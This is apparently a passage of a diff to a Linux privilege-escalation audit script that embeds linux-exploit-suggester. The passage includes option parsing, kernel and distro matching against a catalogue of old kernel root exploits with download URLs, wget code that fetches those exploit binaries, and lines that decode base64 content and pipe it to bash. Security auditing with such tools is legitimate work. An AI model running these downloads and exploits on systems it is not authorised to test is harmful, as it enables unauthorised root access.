        -s|--fetch-sources)
            opt_fetch_srcs=true
            ;;
        -k|--kernel)
            shift
            KERNEL="$1"
            opt_kernel_version=true
            ;;
        -d|--show-dos)
            opt_show_dos=true
            ;;
        -p|--pkglist-file)
            shift
            PKGLIST_FILE="$1"
            opt_pkglist_file=true
            ;;
        --cvelist-file)
            shift
            CVELIST_FILE="$1"
            opt_cvelist_file=true
            ;;
        --checksec)
            opt_checksec_mode=true
            ;;
        --kernelspace-only)
            opt_kernel_only=true
            ;;
        --userspace-only)
            opt_userspace_only=true
            ;;
        --skip-more-checks)
            opt_skip_more_checks=true
            ;;
        --skip-pkg-versions)
            opt_skip_pkg_versions=true
            ;;
        *)
            shift
            if [ "$#" != "0" ]; then
                exitWithErrMsg "Unknown option '$1'. Aborting."
            fi
            break
            ;;
    esac
    shift
done

# check Bash version (associative arrays need Bash in version 4.0+)
if ((BASH_VERSINFO[0] < 4)); then
    exitWithErrMsg "Script needs Bash in version 4.0 or newer. Aborting."
fi

# exit if both --kernel and --uname are set
[ "$opt_kernel_version" = "true" ] && [ $opt_uname_string = "true" ] && exitWithErrMsg "Switches -u|--uname and -k|--kernel are mutually exclusive. Aborting."

# exit if both --full and --short are set
[ "$opt_full" = "true" ] && [ $opt_summary = "true" ] && exitWithErrMsg "Switches -f|--full and -g|--short are mutually exclusive. Aborting."

# --cvelist-file mode is standalone mode and is not applicable when one of -k | -u | -p | --checksec switches are set
if [ "$opt_cvelist_file" = "true" ]; then
    [ ! -e "$CVELIST_FILE" ] && exitWithErrMsg "Provided CVE list file does not exists. Aborting."
    [ "$opt_kernel_version" = "true" ] && exitWithErrMsg "Switches -k|--kernel and --cvelist-file are mutually exclusive. Aborting."
    [ "$opt_uname_string" = "true" ] && exitWithErrMsg "Switches -u|--uname and --cvelist-file are mutually exclusive. Aborting."
    [ "$opt_pkglist_file" = "true" ] && exitWithErrMsg "Switches -p|--pkglist-file and --cvelist-file are mutually exclusive. Aborting."
fi

# --checksec mode is standalone mode and is not applicable when one of -k | -u | -p | --cvelist-file switches are set
if [ "$opt_checksec_mode" = "true" ]; then
    [ "$opt_kernel_version" = "true" ] && exitWithErrMsg "Switches -k|--kernel and --checksec are mutually exclusive. Aborting."
    [ "$opt_uname_string" = "true" ] && exitWithErrMsg "Switches -u|--uname and --checksec are mutually exclusive. Aborting."
    [ "$opt_pkglist_file" = "true" ] && exitWithErrMsg "Switches -p|--pkglist-file and --checksec are mutually exclusive. Aborting."
fi

# extract kernel version and other OS info like distro name, distro version, etc. 3 possibilities here:
# case 1: --kernel set
if [ "$opt_kernel_version" == "true" ]; then
    # TODO: add kernel version number validation
    [ -z "$KERNEL" ] && exitWithErrMsg "Unrecognized kernel version given. Aborting."
    ARCH=""
    OS=""

    # do not perform additional checks on current machine
    opt_skip_more_checks=true

    # do not consider current OS
    getPkgList "" "$PKGLIST_FILE"

# case 2: --uname set
elif [ "$opt_uname_string" == "true" ]; then
    [ -z "$UNAME_A" ] && exitWithErrMsg "uname string empty. Aborting."
    parseUname "$UNAME_A"

    # do not perform additional checks on current machine
    opt_skip_more_checks=true

    # do not consider current OS
    getPkgList "" "$PKGLIST_FILE"

# case 3: --cvelist-file mode
elif [ "$opt_cvelist_file" = "true" ]; then

    # get kernel configuration in this mode
    [ "$opt_skip_more_checks" = "false" ] && getKernelConfig

# case 4: --checksec mode
elif [ "$opt_checksec_mode" = "true" ]; then

    # this switch is not applicable in this mode
    opt_skip_more_checks=false

    # get kernel configuration in this mode
    getKernelConfig
    [ -z "$KCONFIG" ] && echo "WARNING. Kernel Config not found on the system results won't be complete."

    # launch checksec mode
    checksecMode

    exit 0

# case 5: no --uname | --kernel | --cvelist-file | --checksec set
else

    # --pkglist-file NOT provided: take all info from current machine
    # case for vanilla execution: ./linux-exploit-suggester.sh
    if [ "$opt_pkglist_file" == "false" ]; then
        UNAME_A=$(uname -a)
        [ -z "$UNAME_A" ] && exitWithErrMsg "uname string empty. Aborting."
        parseUname "$UNAME_A"

        # get kernel configuration in this mode
        [ "$opt_skip_more_checks" = "false" ] && getKernelConfig

        # extract distribution version from /etc/os-release OR /etc/lsb-release
        [ -n "$OS" -a "$opt_skip_more_checks" = "false" ] && DISTRO=$(grep -s -E '^DISTRIB_RELEASE=|^VERSION_ID=' /etc/*-release | cut -d'=' -f2 | head -1 | tr -d '"')

        # extract package listing from current OS
        getPkgList "$OS" ""

    # --pkglist-file provided: only consider userspace exploits against provided package listing
    else
        KERNEL=""
        #TODO: extract machine arch from package listing
        ARCH=""
        unset EXPLOITS
        declare -A EXPLOITS
        getPkgList "" "$PKGLIST_FILE"

        # additional checks are not applicable for this mode
        opt_skip_more_checks=true
    fi
fi

echo
echo -e "${bldwht}Available information:${txtrst}"
echo
[ -n "$KERNEL" ] && echo -e "Kernel version: ${txtgrn}$KERNEL${txtrst}" || echo -e "Kernel version: ${txtred}N/A${txtrst}"
echo "Architecture: $([ -n "$ARCH" ] && echo -e "${txtgrn}$ARCH${txtrst}" || echo -e "${txtred}N/A${txtrst}")"
echo "Distribution: $([ -n "$OS" ] && echo -e "${txtgrn}$OS${txtrst}" || echo -e "${txtred}N/A${txtrst}")"
echo -e "Distribution version: $([ -n "$DISTRO" ] && echo -e "${txtgrn}$DISTRO${txtrst}" || echo -e "${txtred}N/A${txtrst}")"

echo "Additional checks (CONFIG_*, sysctl entries, custom Bash commands): $([ "$opt_skip_more_checks" == "false" ] && echo -e "${txtgrn}performed${txtrst}" || echo -e "${txtred}N/A${txtrst}")"

if [ -n "$PKGLIST_FILE" -a -n "$PKG_LIST" ]; then
    pkgListFile="${txtgrn}$PKGLIST_FILE${txtrst}"
elif [ -n "$PKGLIST_FILE" ]; then
    pkgListFile="${txtred}unrecognized file provided${txtrst}"
elif [ -n "$PKG_LIST" ]; then
    pkgListFile="${txtgrn}from current OS${txtrst}"
fi

echo -e "Package listing: $([ -n "$pkgListFile" ] && echo -e "$pkgListFile" || echo -e "${txtred}N/A${txtrst}")"

# handle --kernelspacy-only & --userspace-only filter options
if [ "$opt_kernel_only" = "true" -o -z "$PKG_LIST" ]; then
    unset EXPLOITS_USERSPACE
    declare -A EXPLOITS_USERSPACE
fi

if [ "$opt_userspace_only" = "true" ]; then
    unset EXPLOITS
    declare -A EXPLOITS
fi

echo
echo -e "${bldwht}Searching among:${txtrst}"
echo
echo "${#EXPLOITS[@]} kernel space exploits"
echo "${#EXPLOITS_USERSPACE[@]} user space exploits"
echo

echo -e "${bldwht}Possible Exploits:${txtrst}"
echo

# start analysis
j=0
for EXP in "${EXPLOITS[@]}" "${EXPLOITS_USERSPACE[@]}"; do

    # create array from current exploit here doc and fetch needed lines
    i=0
    # ('-r' is used to not interpret backslash used for bash colors)
    while read -r line
    do
        arr[i]="$line"
        i=$((i + 1))
    done <<< "$EXP"

    NAME="${arr[0]}" && NAME="${NAME:6}"
    REQS="${arr[1]}" && REQS="${REQS:6}"
    TAGS="${arr[2]}" && TAGS="${TAGS:6}"
    RANK="${arr[3]}" && RANK="${RANK:6}"

    # split line with requirements & loop thru all reqs one by one & check whether it is met
    IFS=',' read -r -a array <<< "$REQS"
    REQS_NUM=${#array[@]}
    PASSED_REQ=0
    for REQ in "${array[@]}"; do
        if (checkRequirement "$REQ" "${array[0]}"); then
            PASSED_REQ=$(($PASSED_REQ + 1))
        else
            break
        fi
    done

    # execute for exploits with all requirements met
    if [ $PASSED_REQ -eq $REQS_NUM ]; then

        # additional requirement for --cvelist-file mode: check if CVE associated with the exploit is on the CVELIST_FILE
        if [ "$opt_cvelist_file" = "true" ]; then

            # extract CVE(s) associated with given exploit (also translates ',' to '|' for easy handling multiple CVEs case - via extended regex)
            cve=$(echo "$NAME" | grep '.*\[.*\].*' | cut -d 'm' -f2 | cut -d ']' -f1 | tr -d '[' | tr "," "|")
            #echo "CVE: $cve"

            # check if it's on CVELIST_FILE list, if no move to next exploit
            [ ! $(cat "$CVELIST_FILE" | grep -E "$cve") ] && continue
        fi

        # process tags and highlight those that match current OS (only for deb|ubuntu|RHEL and if we know distro version - direct mode)
        tags=""
        if [ -n "$TAGS" -a -n "$OS" ]; then
            IFS=',' read -r -a tags_array <<< "$TAGS"
            TAGS_NUM=${#tags_array[@]}

            # bump RANK slightly (+1) if we're in '--uname' mode and there's a TAG for OS from uname string
            [ "$(echo "${tags_array[@]}" | grep "$OS")" -a "$opt_uname_string" == "true" ] && RANK=$(($RANK + 1))

            for TAG in "${tags_array[@]}"; do
                tag_distro=$(echo "$TAG" | cut -d'=' -f1)
                tag_distro_num_all=$(echo "$TAG" | cut -d'=' -f2)
                # in case of tag of form: 'ubuntu=16.04{kernel:4.4.0-21} remove kernel versioning part for comparision
                tag_distro_num="${tag_distro_num_all%{*}"

                # we're in '--uname' mode OR (for normal mode) if there is distro version match
                if [ "$opt_uname_string" == "true" -o \( "$OS" == "$tag_distro" -a "$(echo "$DISTRO" | grep -E "$tag_distro_num")" \) ]; then

                    # bump current exploit's rank by 2 for distro match (and not in '--uname' mode)
                    [ "$opt_uname_string" == "false" ] && RANK=$(($RANK + 2))

                    # get name (kernel or package name) and version of kernel/pkg if provided:
                    tag_pkg=$(echo "$tag_distro_num_all" | cut -d'{' -f 2 | tr -d '}' | cut -d':' -f 1)
                    tag_pkg_num=""
                    [ $(echo "$tag_distro_num_all" | grep '{') ] && tag_pkg_num=$(echo "$tag_distro_num_all" | cut -d'{' -f 2 | tr -d '}' | cut -d':' -f 2)

                    #[ -n "$tag_pkg_num" ] && echo "tag_pkg_num: $tag_pkg_num; kernel: $KERNEL_ALL"

                    # if pkg/kernel version is not provided:
                    if [ -z "$tag_pkg_num" ]; then
                        [ "$opt_uname_string" == "false" ] && TAG="${lightyellow}[ ${TAG} ]${txtrst}"

                    # kernel version provided, check for match:
                    elif [ -n "$tag_pkg_num" -a "$tag_pkg" = "kernel" ]; then
                        if [ $(echo "$KERNEL_ALL" | grep -E "${tag_pkg_num}") ]; then
                            # kernel version matched - bold highlight
                            TAG="${yellow}[ ${TAG} ]${txtrst}"

                            # bump current exploit's rank additionally by 3 for kernel version regex match
                            RANK=$(($RANK + 3))
                        else
                            [ "$opt_uname_string" == "false" ] && TAG="${lightyellow}[ $tag_distro=$tag_distro_num ]${txtrst}{kernel:$tag_pkg_num}"
                        fi

                    # pkg version provided, check for match (TBD):
                    elif [ -n "$tag_pkg_num" -a -n "$tag_pkg"  ]; then
                        TAG="${lightyellow}[ $tag_distro=$tag_distro_num ]${txtrst}{$tag_pkg:$tag_pkg_num}"
                    fi

                fi

                # append current tag to tags list
                tags="${tags}${TAG},"
            done
            # trim ',' added by above loop
            [ -n "$tags" ] && tags="${tags%?}"
        else
            tags="$TAGS"
        fi

        # insert the matched exploit (with calculated Rank and highlighted tags) to arrary that will be sorted
        EXP=$(echo "$EXP" | sed -e '/^Name:/d' -e '/^Reqs:/d' -e '/^Tags:/d')
        exploits_to_sort[j]="${RANK}Name: ${NAME}D3L1mReqs: ${REQS}D3L1mTags: ${tags}D3L1m$(echo "$EXP" | sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/D3L1m/g')"
        ((j++))
    fi
done

# sort exploits based on calculated Rank
IFS=$'\n'
SORTED_EXPLOITS=($(sort -r <<<"${exploits_to_sort[*]}"))
unset IFS

# display sorted exploits
for EXP_TEMP in "${SORTED_EXPLOITS[@]}"; do

	RANK=$(echo "$EXP_TEMP" | awk -F'Name:' '{print $1}')

	# convert entry back to canonical form
	EXP=$(echo "$EXP_TEMP" | sed 's/^[0-9]//g' | sed 's/D3L1m/\n/g')

	# create array from current exploit here doc and fetch needed lines
    i=0
    # ('-r' is used to not interpret backslash used for bash colors)
    while read -r line
    do
        arr[i]="$line"
        i=$((i + 1))
    done <<< "$EXP"

    NAME="${arr[0]}" && NAME="${NAME:6}"
    REQS="${arr[1]}" && REQS="${REQS:6}"
    TAGS="${arr[2]}" && tags="${TAGS:6}"

	EXPLOIT_DB=$(echo "$EXP" | grep "exploit-db: " | awk '{print $2}')
	analysis_url=$(echo "$EXP" | grep "analysis-url: " | awk '{print $2}')
	ext_url=$(echo "$EXP" | grep "ext-url: " | awk '{print $2}')
	comments=$(echo "$EXP" | grep "Comments: " | cut -d' ' -f 2-)
	reqs=$(echo "$EXP" | grep "Reqs: " | cut -d' ' -f 2)

	# exploit name without CVE number and without commonly used special chars
	name=$(echo "$NAME" | cut -d' ' -f 2- | tr -d ' ()/')

	bin_url=$(echo "$EXP" | grep "bin-url: " | awk '{print $2}')
	src_url=$(echo "$EXP" | grep "src-url: " | awk '{print $2}')
	[ -z "$src_url" ] && [ -n "$EXPLOIT_DB" ] && src_url="https://www.exploit-db.com/download/$EXPLOIT_DB"
	[ -z "$src_url" ] && [ -z "$bin_url" ] && exitWithErrMsg "'src-url' / 'bin-url' / 'exploit-db' entries are all empty for '$NAME' exploit - fix that. Aborting."

	if [ -n "$analysis_url" ]; then
        details="$analysis_url"
	elif $(echo "$src_url" | grep -q 'www.exploit-db.com'); then
        details="https://www.exploit-db.com/exploits/$EXPLOIT_DB/"
	elif [[ "$src_url" =~ ^.*tgz|tar.gz|zip$ && -n "$EXPLOIT_DB" ]]; then
        details="https://www.exploit-db.com/exploits/$EXPLOIT_DB/"
	else
        details="$src_url"
	fi

	# skip DoS by default
	dos=$(echo "$EXP" | grep -o -i "(dos")
	[ "$opt_show_dos" == "false" ] && [ -n "$dos" ] && continue

	# handles --fetch-binaries option
	if [ $opt_fetch_bins = "true" ]; then
        for i in $(echo "$EXP" | grep "bin-url: " | awk '{print $2}'); do
            [ -f "${name}_$(basename $i)" ] && rm -f "${name}_$(basename $i)"
            wget -q -k "$i" -O "${name}_$(basename $i)"
        done
    fi

	# handles --fetch-sources option
	if [ $opt_fetch_srcs = "true" ]; then
        [ -f "${name}_$(basename $src_url)" ] && rm -f "${name}_$(basename $src_url)"
        wget -q -k "$src_url" -O "${name}_$(basename $src_url)" &
    fi

    # display result (short)
	if [ "$opt_summary" = "true" ]; then
	[ -z "$tags" ] && tags="-"
	echo -e "$NAME || $tags || $src_url"
	continue
	fi

# display result (standard)
	echo -e "[+] $NAME"
	echo -e "\n   Details: $details"
        echo -e "   Exposure: $(displayExposure $RANK)"
        [ -n "$tags" ] && echo -e "   Tags: $tags"
        echo -e "   Download URL: $src_url"
        [ -n "$ext_url" ] && echo -e "   ext-url: $ext_url"
        [ -n "$comments" ] && echo -e "   Comments: $comments"

        # handles --full filter option
        if [ "$opt_full" = "true" ]; then
            [ -n "$reqs" ] && echo -e "   Requirements: $reqs"

            [ -n "$EXPLOIT_DB" ] && echo -e "   exploit-db: $EXPLOIT_DB"

            author=$(echo "$EXP" | grep "author: " | cut -d' ' -f 2-)
            [ -n "$author" ] && echo -e "   author: $author"
        fi

        echo

done
" - if [ "$EXTRA_CHECKS" ]; then - echo $les_b64 | base64 -d | bash -s -- --checksec | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | sed -E "s,\[CVE-[0-9]+-[0-9]+\].*,${SED_RED},g" - else - echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,\[CVE-[0-9]+-[0-9]+\],*,${SED_RED},g" - fi + les_b64="#!/bin/bash

#
# Copyright (c) 2016-2022, @_mzet_
#
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under the terms of the GNU General Public License. See LICENSE
# file for usage of this software.
#

VERSION=v1.1

# bash colors
#txtred="\e[0;31m"
txtred="\e[91;1m"
txtgrn="\e[1;32m"
txtgray="\e[0;37m"
txtblu="\e[0;36m"
txtrst="\e[0m"
bldwht='\e[1;37m'
wht='\e[0;36m'
bldblu='\e[1;34m'
yellow='\e[1;93m'
lightyellow='\e[0;93m'

# input data
UNAME_A=""

# parsed data for current OS
KERNEL=""
OS=""
DISTRO=""
ARCH=""
PKG_LIST=""

# kernel config
KCONFIG=""

CVELIST_FILE=""

opt_fetch_bins=false
opt_fetch_srcs=false
opt_kernel_version=false
opt_uname_string=false
opt_pkglist_file=false
opt_cvelist_file=false
opt_checksec_mode=false
opt_full=false
opt_summary=false
opt_kernel_only=false
opt_userspace_only=false
opt_show_dos=false
opt_skip_more_checks=false
opt_skip_pkg_versions=false

ARGS=
SHORTOPTS="hVfbsu:k:dp:g"
LONGOPTS="help,version,full,fetch-binaries,fetch-sources,uname:,kernel:,show-dos,pkglist-file:,short,kernelspace-only,userspace-only,skip-more-checks,skip-pkg-versions,cvelist-file:,checksec"

## exploits database
declare -a EXPLOITS
declare -a EXPLOITS_USERSPACE

## temporary array for purpose of sorting exploits (based on exploits' rank)
declare -a exploits_to_sort
declare -a SORTED_EXPLOITS

############ LINUX KERNELSPACE EXPLOITS ####################
n=0

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-1235]${txtrst} elflbl
Reqs: pkg=linux-kernel,ver=2.4.29
Tags:
Rank: 1
analysis-url: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/elflbl
exploit-db: 744
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-1235]${txtrst} uselib()
Reqs: pkg=linux-kernel,ver=2.4.29
Tags:
Rank: 1
analysis-url: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
exploit-db: 778
Comments: Known to work only for 2.4 series (even though 2.6 is also vulnerable)
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-1235]${txtrst} krad3
Reqs: pkg=linux-kernel,ver>=2.6.5,ver<=2.6.11
Tags:
Rank: 1
exploit-db: 1397
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-0077]${txtrst} mremap_pte
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.2
Tags:
Rank: 1
exploit-db: 160
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} raptor_prctl
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2031
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2004
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl2
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2005
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl3
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2006
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-2451]${txtrst} prctl4
Reqs: pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17
Tags:
Rank: 1
exploit-db: 2011
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2006-3626]${txtrst} h00lyshit
Reqs: pkg=linux-kernel,ver>=2.6.8,ver<=2.6.16
Tags:
Rank: 1
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/h00lyshit
exploit-db: 2013
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-0600]${txtrst} vmsplice1
Reqs: pkg=linux-kernel,ver>=2.6.17,ver<=2.6.24
Tags:
Rank: 1
exploit-db: 5092
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-0600]${txtrst} vmsplice2
Reqs: pkg=linux-kernel,ver>=2.6.23,ver<=2.6.24
Tags:
Rank: 1
exploit-db: 5093
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-4210]${txtrst} ftrex
Reqs: pkg=linux-kernel,ver>=2.6.11,ver<=2.6.22
Tags:
Rank: 1
exploit-db: 6851
Comments: world-writable sgid directory and shell that does not drop sgid privs upon exec (ash/sash) are required
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2008-4210]${txtrst} exit_notify
Reqs: pkg=linux-kernel,ver>=2.6.25,ver<=2.6.29
Tags:
Rank: 1
exploit-db: 8369
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692]${txtrst} sock_sendpage (simple version)
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: ubuntu=7.10,RHEL=4,fedora=4|5|6|7|8|9|10|11
Rank: 1
exploit-db: 9479
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: ubuntu=9.04
Rank: 1
analysis-url: https://xorl.wordpress.com/2009/07/16/cve-2009-1895-linux-kernel-per_clear_on_setid-personality-bypass/
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9435.tgz
exploit-db: 9435
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage2
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: 
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9436.tgz
exploit-db: 9436
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage3
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: 
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9641.tar.gz
exploit-db: 9641
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2692,CVE-2009-1895]${txtrst} sock_sendpage (ppc)
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30
Tags: ubuntu=8.10,RHEL=4|5
Rank: 1
exploit-db: 9545
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} the rebel (udp_sendmsg)
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19
Tags: debian=4
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9574.tgz
exploit-db: 9574
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
author: spender
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} hoagie_udp_sendmsg
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
Tags: debian=4
Rank: 1
exploit-db: 9575
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
author: andi
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} katon (udp_sendmsg)
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
Tags: debian=4
Rank: 1
src-url: https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/raw/master/2009/CVE-2009-2698/katon.c
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
author: VxHell Labs
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-2698]${txtrst} ip_append_data
Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86
Tags: fedora=4|5|6,RHEL=4
Rank: 1
analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html
exploit-db: 9542
author: p0c73n1
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-3547]${txtrst} pipe.c 1
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31
Tags:
Rank: 1
exploit-db: 33321
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-3547]${txtrst} pipe.c 2
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31
Tags:
Rank: 1
exploit-db: 33322
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-3547]${txtrst} pipe.c 3
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.31
Tags:
Rank: 1
exploit-db: 10018
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3301]${txtrst} ptrace_kmod2
Reqs: pkg=linux-kernel,ver>=2.6.26,ver<=2.6.34
Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server}
Rank: 1
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/kmod2
bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/ptrace-kmod
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/ptrace_kmod2-64
exploit-db: 15023
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-1146]${txtrst} reiserfs
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<=2.6.34
Tags: ubuntu=9.10
Rank: 1
analysis-url: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/
src-url: https://jon.oberheide.org/files/team-edward.py
exploit-db: 12130
comments: Requires a ReiserFS filesystem mounted with extended attributes
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-2959]${txtrst} can_bcm
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<=2.6.36
Tags: ubuntu=10.04{kernel:2.6.32-24-generic}
Rank: 1
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/can_bcm
exploit-db: 14814
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3904]${txtrst} rds
Reqs: pkg=linux-kernel,ver>=2.6.30,ver<2.6.37
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}
Rank: 1
analysis-url: http://www.securityfocus.com/archive/1/514379
src-url: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/rds
bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/rds64
exploit-db: 15285
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3848,CVE-2010-3850,CVE-2010-4073]${txtrst} half_nelson
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags: ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server}
Rank: 1
bin-url: http://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/half-nelson3
exploit-db: 17787
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[N/A]${txtrst} caps_to_root
Reqs: pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36,x86
Tags: ubuntu=10.10
Rank: 1
exploit-db: 15916
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[N/A]${txtrst} caps_to_root 2
Reqs: pkg=linux-kernel,ver>=2.6.34,ver<=2.6.36
Tags: ubuntu=10.10
Rank: 1
exploit-db: 15944
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-4347]${txtrst} american-sign-language
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags:
Rank: 1
exploit-db: 15774
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3437]${txtrst} pktcdvd
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags: ubuntu=10.04
Rank: 1
exploit-db: 15150
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-3081]${txtrst} video4linux
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.33
Tags: RHEL=5
Rank: 1
exploit-db: 15024
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
